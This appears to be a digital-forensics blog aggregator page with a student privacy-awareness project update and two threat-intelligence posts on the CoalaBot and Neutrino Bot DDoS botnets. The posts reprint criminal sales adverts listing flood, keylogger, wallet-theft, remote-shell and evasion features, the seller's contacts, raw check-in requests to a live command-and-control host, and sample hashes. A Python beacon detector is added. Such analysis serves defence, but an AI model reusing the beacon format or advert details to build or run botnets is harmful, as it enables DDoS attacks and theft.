Forensic Blogs

An aggregator for digital forensics blogs

December 16, 2020 by LCDI

The Vermont Privacy Project

As the internet ties in more and more with our daily lives, internet privacy has become a big concern. The Vermont Privacy Breach project at the Leahy Center is a team of students working with a Champlain student supervisor and Leahy Center Fellow Judy Boyd to tackle this growing issue. Our goal is to reduce the number of privacy incidents affecting residents of the State of Vermont. We plan to accomplish this by providing simple resources that small businesses, local governments, and nonprofits can use to make themselves more secure.

What Have We Accomplished?

Over the course of the semester, the team has been hard at work researching privacy breaches and related data. The plan is to use this data to create simple presentations that can be given to businesses and individuals alike. Our team extensively researched what a data privacy breach is, who it affects, and how to prevent one. We put all of our research into a shared Google Drive folder and refined the scope of the project. We focused on teaching and presenting to others what privacy breaches are and how to prevent them. Phase One of this project encompassed common risks, the impact of breaches on individuals and organizations, and measures to prevent or mitigate risk. We are currently creating an initial presentation outlining Phase One of this project.

What is a Data Breach?

A data breach is any unauthorized access to a business's, state agency's, or individual's digital systems. These attacks come in a large variety of forms, and each comes with its own challenges. For example, phishing attacks look like messages sent from a legitimate company but trick you into entering your information so the attacker can use it themselves. Ransomware and malware are other forms of attack: programs downloaded onto the machine that can read files, edit them, or even lock you out of the entire computer. Then there are attacks that try to overload your connection to the internet, called DDoS attacks, which flood your connection with junk traffic.

These are all incredibly dangerous and serious issues for anybody with a computer, and as technology advances, we're finding those computers in everyday objects. If you have any sort of wireless surveillance in your home, that could become a risk. But by limiting who has access to your devices and watching what you download, you bring that risk down considerably. The steps to better computer safety are simple and anybody can take them; it's just a matter of spreading that information. Therefore, we're excited to have the opportunity to work on that goal and help those in our community and elsewhere.

What’s Next?

The next steps of our project are to finalize and practice our Phase One presentation and prepare to deliver it for the first time. We are really looking forward to collaborating with the Burlington Sunrise Rotary Club. It's exciting to see the progress we have made with this project, and we hope to see a glimpse of what may come next. For Phase Two, we will be looking at privacy risks specific to local government agencies, nonprofits, and small businesses, and at how we can bring this material to more people.

Stay up to date with the Leahy Center by following us on LinkedIn, Twitter, Instagram, and Facebook!

The post The Vermont Privacy Project appeared first on The Leahy Center for Digital Forensics & Cybersecurity.

Read the original at: The Leahy Center for Digital Forensics & Cybersecurity
Filed Under: Digital Forensics, Uncategorized
Tagged With: Blog Post, Bluetooth Security, Ddos, Internet of Things, Malware, phishing, privacy, Ransomware

October 16, 2017 by Kafeine

CoalaBot: HTTP DDoS Bot

CoalaBot appears to be built on August Stealer code (the panel and traffic are really alike).

I found it spread as a task in a Betabot and in an Andromeda spread via RIG, fed by at least one HilltopAds malvertising campaign.

2017-09-11: a witnessed infection chain to CoalaBot

A look inside:

CoalaBot: Login Screen (August Stealer alike)
CoalaBot: Statistics
CoalaBot: Bots
CoalaBot: Tasks
CoalaBot: New Tasks (list)
CoalaBot: HTTP GET task details
CoalaBot: HTTP POST task details
CoalaBot: Settings

Here is the translated associated advert, published on 2017-08-23 by a user going by the nick Discomrade (thanks to Andrew Komarov and others who provided help here).
------------------------------------------
Coala Http Ddos Bot
The software focuses on L7 attacks (HTTP). Lower levels have more primitive attacks.
Attack types:
• ICMP (PING) FLOOD
• UDP FLOOD
• TCP FLOOD
• HTTP ARME
• HTTP GET *
• HTTP POST *
• HTTP SLOWLORIS *
• HTTP PULSE WAVE *
* - Supports SMART mode, i.e. bypasses Cloudflare/Blazingfast and similar services (but doesn't bypass CAPTCHA). All types except ICMP/UDP have support for using SSL.

Binary:
• .NET 2.0 x86 (100% working capacity WIN XP - WIN 7; on later OS versions .NET 2.0 is disabled by default)
• ~100kb after obfuscation
• Auto Backup (optional)
• Low CPU load for efficient use
• Encryption of incoming/outgoing traffic
• No installation on machines from former CIS countries (RU/UA/BL/KZ/...)
• Scan time non-FUD. Contact us if you need a recommendation for a good crypting service.
• Ability to link a build to more than one gate.
Panel:
• Detailed statistics on time online/architecture/etc.
• List of bots, detailed information
• Number count of requests per second (total/for each bot)
• Creation of groups for attacks
• Auto sorting of bots by groups
• Creation of tasks, the ability to choose by group/country
• Setting an optional time for bots success rate
Other:
• Providing macros for randomization of sent data
• Support of .onion gate
• Ability to install an additional layer (BOT => LAYER => MAIN GATE)

Requirements:
• PHP 5.6 or higher
• MySQL
• Module for MySQLi (mysqli_nd); php-mbstring, php-json, php-mcrypt extensions
Screenshots:
• Statistics - http://i.imgur.com/FUevsaS.jpg
• Bots - http://i.imgur.com/nDwl9pY.jpg
• Created tasks - http://i.imgur.com/RltiDhl.png
• Task List - http://i.imgur.com/tqEEpX0.jpg
• Settings - http://i.imgur.com/EbhExjE.jpg

Price:
• $300 - build and panel. Up to 3 gates for one build.
• $20 - rebuild
The price can vary depending on updates.
Escrow service is welcome.
Help with installation is no charge.
------------------------------------------

Sample:

VT link
MD5 f3862c311c67cb027a06d4272b680a3b
SHA1 0ff1584eec4fc5c72439d94e8cee922703c44049
SHA256 fd07ad13dbf9da3f7841bc0dbfd303dc18153ad36259d9c6db127b49fa01d08f

Emerging Threats rules:
2024531 || ET TROJAN MSIL/CoalaBot CnC Activity

Read More:
August in November: New Information Stealer Hits the Scene - 2016-12-07 - Proofpoint

Read the original at: Malware don't need Coffee
Filed Under: Digital Forensics
Tagged With: August, Coala, Coalabot, Ddos, kye

June 18, 2014 by Kafeine

Neutrino Bot (aka MS:Win32/Kasidet)

Advertised on underground forums by n3utrino since December 2013, Neutrino Bot is another "HTTP stress testing tool", read: DDoS bot.

Piece of the advert

Here is the text of one advert (translated from Russian):
------------------------------------------
Neutrino Bot

- Main functionality
* HTTP(S) flood (GET/POST methods)
* AntiDDOS flood (js/cookie emulation)
* Slowloris flood
* Download flood
* TCP flood
* UDP flood


* Loader (exe, dll, vbs, bat ... + ability to specify parameters for launching the file)
* Keylogger (Multilanguage) (support for virtual keyboards (takes 60x60 screenshots around the click area)) (ability to monitor a specified window)
* Command shell (remote command execution via the Windows command interpreter)
* Stealing files by mask (bitcoin wallets, for example)
* Launching the browser to a specified link (aka view inflator)
* Hosts file replacement
* Stealing Win keys
* Spreading (USB/Archive)
* Checking the cleanliness of installs (number of "neighbors" found on the computer)
* Detection of installed AV (on all Windows OS except server editions)
* Update
* Working through intermediate relays

- Additional functions
* Anti-debugging
* AntiVM
* Sandbox detection
* Detection of all online automated analysis services
* BotKiller

* Bot protection (protection of the process/file/registry keys)
* Unlimited number of simultaneously executed commands (some commands have a higher priority than others and their execution stops the others)
* Unlimited number of backup domains
* Silent operation even under a limited user account
* Does not load the CPU

- Admin panel functionality
* Flexible task creation system
* Detailed statistics on bots
* Ability to give commands to each bot or country separately
* Configurable bot check-in interval
* Sorting of bots in the stats by IP/Online/Country/OS
* Ban system.

- Uncompressed binary size ~ 50kb (language - C)
- Bot tested on the whole Windows line, from XP to 8.1 (x32/64)

Prices -
Full kit (admin panel + bot + build for an unlimited number of domains) - 200$
Rebuild (also unlimited number of domains) - 10$
Update (functional) - 20$
Builder - 550$
Payment - WM BTC Perfect

The binary is licensed; leak it and you lose support.

-Contacts
PM or n3utrino@kaddafi.me / n3utrino@xmpp.jp

Command reference / Detailed description of functionality - http://n3utrino.blog.com/

P.S. The bot has no relation to the exploit kit of the same name.
------------------------------------------
As you can see, it's advertised in the open:

N3utrino blog - Information
N3utrino blog - Price
N3utrino blog - Screenshots

Screenshots provided by the coder on the blog and in forums:

Neutrino - Index
Neutrino - Clients
Neutrino - Clients 2
Neutrino - Stats
Neutrino - Stats 2

The coder also provided the panel on underground forums.

Piece of the Neutrino panel code.

I met one of those bots (v2.5 - dab012115fa267d95c1145a1eb41d38d) as a second stage of an Andromeda pushed in Nuclear Pack (the one featured here).

Here is Neutrino calling back home (cf. attached pcap):

http://nav1111sto.mcdir.ru/modopo/tasks.php

POST /modopo/tasks.php HTTP/1.0
Host: nav1111sto.mcdir.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Content-type: application/x-www-form-urlencoded
Cookie: session=21232f297a57a5a743894a0e4a801fc3
Content-length: 8

ping=1

POST /modopo/tasks.php HTTP/1.0
Host: nav1111sto.mcdir.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Content-type: application/x-www-form-urlencoded
Cookie: session=21232f297a57a5a743894a0e4a801fc3
Content-length: 137

getcmd=1&uid=D2BDB99374A80FB8&os=Windows+XP+PRO+(x32)&av=Not+installed&nat=yes&version=2.5&serial=DFW32-R7WFG-[redacted]-[redacted]-777GD&quality=0

Files: Pcap - Panel (as v2.1) - Bot v2.5

Hashes:
dab012115fa267d95c1145a1eb41d38d (2.5)
bb42fce5d9cb73561ec4e3c343c10d52 (2.1)
e6ea45deca7e9dd9afeb276ec1d4509c (2.0)
ce5c86fb4c44a7655ed6caaf42a688b3 (2.6) - Pushed in Infinity - 2014-06-19
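As an added example (not from the original post and not the bot's or panel's own code), here is a small Python detector that parses raw HTTP requests shaped like the two check-ins above, classifies the ping and getcmd beacons, and pulls out the host, session cookie, bot uid and version an analyst would pivot on. The sample requests are reconstructed from the capture shown above with the User-Agent and Content-length headers trimmed, plus one constructed benign form post; the tasks.php path and the form field names come from the capture, everything else is an assumption.

```python
from urllib.parse import parse_qs

# Constructed samples: the two check-ins quoted above (User-Agent and Content-length
# trimmed, serial left redacted as in the post) plus one benign post that must not match.
SAMPLE_REQUESTS = [
    "POST /modopo/tasks.php HTTP/1.0\r\nHost: nav1111sto.mcdir.ru\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=21232f297a57a5a743894a0e4a801fc3\r\n\r\nping=1",
    "POST /modopo/tasks.php HTTP/1.0\r\nHost: nav1111sto.mcdir.ru\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=21232f297a57a5a743894a0e4a801fc3\r\n\r\n"
    "getcmd=1&uid=D2BDB99374A80FB8&os=Windows+XP+PRO+(x32)&av=Not+installed&nat=yes"
    "&version=2.5&serial=DFW32-R7WFG-[redacted]-[redacted]-777GD&quality=0",
    "POST /login.php HTTP/1.1\r\nHost: example.com\r\n"
    "Content-type: application/x-www-form-urlencoded\r\n\r\nuser=bob&pass=hunter2",
]
GETCMD_FIELDS = {"uid", "os", "av", "version"}  # form fields seen in the getcmd check-in


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {n.strip().lower(): v.strip() for n, _, v in (l.partition(":") for l in lines[1:])}
    return method, path, headers, body


def classify(raw):
    """Return 'ping', 'getcmd' or None for one raw request."""
    method, path, _headers, body = parse_request(raw)
    if method != "POST" or not path.endswith("/tasks.php"):
        return None
    form = parse_qs(body, keep_blank_values=True)
    if form.get("ping") == ["1"] and len(form) == 1:
        return "ping"
    if form.get("getcmd") == ["1"] and GETCMD_FIELDS.issubset(form):
        return "getcmd"
    return None


def beacon_summary(raw):
    """Fields an analyst would pivot on, or None when the request is not a check-in."""
    kind = classify(raw)
    if kind is None:
        return None
    _method, _path, headers, body = parse_request(raw)
    form = parse_qs(body, keep_blank_values=True)
    cookies = dict(p.strip().split("=", 1) for p in headers.get("cookie", "").split(";") if "=" in p)
    return {"kind": kind, "host": headers.get("host"), "session": cookies.get("session"),
            "uid": form.get("uid", [None])[0], "version": form.get("version", [None])[0]}
```

Feeding reassembled POST bodies from a proxy or IDS log through `beacon_summary` gives a per-bot record (host, session, uid, version) that can be joined against the hashes and version numbers listed above.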

Read more:
Barclays Transaction Notification contains "Neutrino Downloader" - 2014-04-10 - Kimberly - StopMalvertising
Post-publication reading:
A Glance Into the Neutrino Botnet - 2014-06-23 - Umesh Wanve - McAfee

Read the original at: Malware don't need Coffee
Filed Under: Digital Forensics
Tagged With: Ddos, n3utrino, Neutrino bot

About

This site aggregates posts from various digital forensics blogs. Feel free to take a look around, and make sure to visit the original sites.


All content is copyright the respective author(s)